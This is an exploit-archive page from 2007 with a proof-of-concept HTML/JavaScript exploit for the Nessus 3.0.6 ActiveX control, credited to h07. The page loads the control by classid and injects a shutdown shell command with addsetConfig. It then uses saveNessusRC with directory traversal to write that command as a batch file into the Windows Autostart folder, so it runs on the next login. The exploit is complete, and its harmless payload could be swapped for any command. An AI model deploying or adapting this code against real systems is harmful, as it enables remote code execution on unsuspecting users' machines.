Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit
# Published : 2007-07-27
# Author : h07
# Previous Title : mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server Data Write/Code Execution
# Next Title : IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit

<HTML>
<!--
Nessus Vulnerability Scanner 3.0.6 ActiveX 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
Just for fun ;]
-->

<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>

<script language="javascript">
obj.addsetConfig('shutdown -t 1000 -s -c "hello world ;]" && pause', '', '');
obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
</script>
</HTML>

# www.Syue.com [2007-07-27]